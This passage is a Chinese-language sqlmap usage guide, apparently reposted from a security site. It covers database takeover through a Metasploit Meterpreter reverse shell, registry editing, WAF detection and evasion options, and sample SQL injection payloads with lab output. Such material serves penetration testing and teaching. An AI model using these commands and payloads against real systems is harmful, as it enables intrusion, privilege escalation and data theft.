[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
&gt; 
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying 
operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
&gt; 
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
&gt; 
which is the local address? [192.168.136.1] 
which local port number do you want to use? [60641] 
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
&gt; 
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..

                                _
                                | |      o
_  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
|  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                        /|
                        \|


    =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
    =[ svn r12272 updated 4 days ago (2011.04.07)

PAYLOAD =&gt; windows/meterpreter/reverse_tcp
EXITFUNC =&gt; thread
LPORT =&gt; 60641
LHOST =&gt; 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641 
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', 
please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -&gt; 192.168.136.129:1689) at Mon Apr 11 
hh:mm:52 +0100 2011

meterpreter &gt; Loading extension espia...success.
meterpreter &gt; Loading extension incognito...success.
meterpreter &gt; [-] The 'priv' extension has already been loaded.
meterpreter &gt; Loading extension sniffer...success.
meterpreter &gt; System Language : en_US
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Computer        : W2K3R2
Architecture    : x86
Meterpreter     : x86/win32
meterpreter &gt; Server username: NT AUTHORITY\SYSTEM
meterpreter &gt; ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0



Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address  : 192.168.136.129
Netmask     : 255.255.255.0


meterpreter &gt; exit

[*] Meterpreter session 1 closed.  Reason: User exit

默認狀況下MySQL在Windows上以SYSTEM權限運行,PostgreSQL在Windows與Linux中是低權限運行,Microsoft SQL Server 2000默認是以SYSTEM權限運行,Microsoft SQL Server 2005與2008大部分是以NETWORK SERVICE有時是LOCAL SERVICE。php

 

對Windows註冊表操做

當數據庫爲MySQL,PostgreSQL或Microsoft SQL Server,而且當前web應用支持堆查詢。 固然,當前鏈接數據庫的用戶也須要有權限操做註冊表。

讀取註冊表值

參數:--reg-read
寫入註冊表值

參數:--reg-add
刪除註冊表值

參數:--reg-del
註冊表輔助選項

參數:--reg-key,--reg-value,--reg-data,--reg-type

須要配合以前三個參數使用,例子:

$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

常規參數
從sqlite中讀取session

參數:-s

sqlmap對每個目標都會在output路徑下自動生成一個SQLite文件,若是用戶想指定讀取的文件路徑,就能夠用這個參數。
保存HTTP(S)日誌

參數:-t

這個參數須要跟一個文本文件,sqlmap會把HTTP(S)請求與響應的日誌保存到那裏。
非交互模式

參數:--batch

用此參數,不須要用戶輸入,將會使用sqlmap提示的默認值一直運行下去。
強制使用字符編碼

參數:--charset

不使用sqlmap自動識別的(如HTTP頭中的Content-Type)字符編碼,強制指定字符編碼如:

--charset=GBK

爬行網站URL

參數:--crawl

sqlmap能夠收集潛在的可能存在漏洞的鏈接,後面跟的參數是爬行的深度。

例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]

規定輸出到CSV中的分隔符

參數:--csv-del

當dump保存爲CSV格式時(--dump-format=CSV),須要一個分隔符默認是逗號,用戶也能夠改成別的 如:

--csv-del=";"

DBMS身份驗證

參數:--dbms-cred

某些時候當前用戶的權限不夠,作某些操做會失敗,若是知道高權限用戶的密碼,可使用此參數,有的數據庫有專門的運行機制,能夠切換用戶如Microsoft SQL Server的OPENROWSET函數
定義dump數據的格式

參數:--dump-format

輸出的格式可定義爲:CSV,HTML,SQLITE
預估完成時間

參數:--eta

能夠計算注入數據的剩餘時間。

例如Oracle的布爾型盲注:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta

[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19

而後:

100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

sqlmap先輸出長度,預計完成時間,顯示百分比,輸出字符
刷新session文件

參數:--flush-session

若是不想用以前緩存這個目標的session文件,可使用這個參數。 會清空以前的session,從新測試該目標。
自動獲取form表單測試

參數:--forms

若是你想對一個頁面的form表單中的參數測試,可使用-r參數讀取請求文件,或者經過--data參數測試。 可是當使用--forms參數時,sqlmap會自動從-u中的url獲取頁面中的表單進行測試。
忽略在會話文件中存儲的查詢結果

參數:--fresh-queries

忽略session文件保存的查詢,從新查詢。
使用DBMS的hex函數

參數:--hex

有時候字符編碼的問題,可能致使數據丟失,可使用hex函數來避免:

針對PostgreSQL例子:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors

[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]

自定義輸出的路徑

參數:--output-dir

sqlmap默認把session文件跟結果文件保存在output文件夾下,用此參數可自定義輸出路徑 例如:--output-dir=/tmp
從響應中獲取DBMS的錯誤信息

參數:--parse-errors

有時目標沒有關閉DBMS的報錯,當數據庫語句錯誤時,會輸出錯誤語句,用詞參數能夠會顯出錯誤信息。

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]

其餘的一些參數
使用參數縮寫

參數:-z

有使用參數太長太複雜,可使用縮寫模式。 例如:

python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1" 

能夠寫成:

python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1" 

還有:

python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1" 

能夠寫成:

python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"

成功SQL注入時警告 

參數:--alert
設定會發的答案

參數:--answers

當但願sqlmap提出輸入時,自動輸入本身想要的答案可使用此參數: 例子:

$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1"--technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]

發現SQL注入時發出蜂鳴聲

參數:--beep

發現sql注入時,發出蜂鳴聲。
啓發式檢測WAF/IPS/IDS保護

參數:--check-waf

WAF/IPS/IDS保護可能會對sqlmap形成很大的困擾,若是懷疑目標有此防禦的話,可使用此參數來測試。 sqlmap將會使用一個不存在的參數來注入測試

例如:

&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1

若是有保護的話可能返回結果會不一樣。
清理sqlmap的UDF(s)和表

參數:--cleanup

清除sqlmap注入時產生的udf與表。
禁用彩色輸出

參數:--disable-coloring

sqlmap默認彩色輸出,可使用此參數,禁掉彩色輸出。
使用指定的Google結果頁面

參數:--gpage

默認sqlmap使用前100個URL地址做爲注入測試,結合此選項,能夠指定頁面的URL測試。
使用HTTP參數污染

參數:-hpp

HTTP參數污染可能會繞過WAF/IPS/IDS保護機制,這個對ASP/IIS與ASP.NET/IIS平臺頗有效。
測試WAF/IPS/IDS保護

參數:--identify-waf

sqlmap能夠嘗試找出WAF/IPS/IDS保護,方便用戶作出繞過方式。目前大約支持30種產品的識別。

例如對一個受到ModSecurity WAF保護的MySQL例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]

模仿智能手機

參數:--mobile

有時服務端只接收移動端的訪問,此時能夠設定一個手機的User-Agent來模仿手機登錄。

例如:

$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]

安全的刪除output目錄的文件

參數:--purge-output

有時須要刪除結果文件,而不被恢復,可使用此參數,原有文件將會被隨機的一些文件覆蓋。

例如:

$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]

啓發式判斷注入

參數:--smart

有時對目標很是多的URL進行測試,爲節省時間,只對可以快速判斷爲注入的報錯點進行注入,可使用此參數。

例子:

$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]

初級用戶嚮導參數

參數:--wizard 面向初級用戶的參數,能夠一步一步教你如何輸入針對目標註入。

$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- 

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
    Oct 14 2005 00:33:37 
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True

[*] shutting down at 11:25:52

轉載自:http://drops.wooyun.org/tips/143python

相關文章
相關標籤/搜索